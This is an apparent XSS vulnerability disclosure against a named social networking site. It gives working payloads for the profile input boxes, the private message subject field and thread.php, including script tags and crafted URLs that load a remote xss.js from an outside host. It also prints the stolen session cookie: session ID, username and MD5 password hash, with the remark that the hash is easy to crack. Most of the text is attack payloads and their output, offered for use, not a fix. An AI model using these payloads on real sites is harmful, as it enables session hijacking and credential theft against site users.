Yourfacesucks.com Homepage: http://www.yourfacesucks.com Effected files: music/video input boxes in editing profile subject box of sending a PM thread.php --------------------------------------- XSS Vuln with cookie disclosure in profile input boxes: No filter evasion needed here. For PoC try putting <SCRIPT SRC=http://ha.youfucktard.com/xss.js></SCRIPT> in Music/Video input box. And the cookie data we see is: This is remote text via xss.js located at youfucktard.com PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; onlineid=274562 Breaking down our cookie: PHPSESSID = (Our php session ID) db_user= (Our username) loggedin= (Logged in:yes) staus=0 (Probably means our profile has not been approved yet sessuid = (Session userid) md5pass= (md5 hash of our password) onlineid= (Our userid #) So, now we know our username (luny666) and our password hash, which can easily be cracked. Screenshots: http://www.youfucktard.com/xsp/facesucks1.jpg http://www.youfucktard.com/xsp/facesucks2.jpg ---------------------------------------------- Sending PM's XSS Vuln: No filter evasion needed,in the subject box put: <IMG SRC=javascript:alert('XSS')> Screenshot: http://www.youfucktard.com/xsp/facesucks3.jpg ---------------------------------------------- Viewing threads on thread.php: Escaping quotes with a few empty tags try putting this for a PoC Viewing the forum (The whole page fills with this vuln, got about 25 popups with this): http://www.yourfacesucks.com/forums/thread.php?forumid=15";>">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<""> Viewing a specific thread in the forum: http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713";>">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">
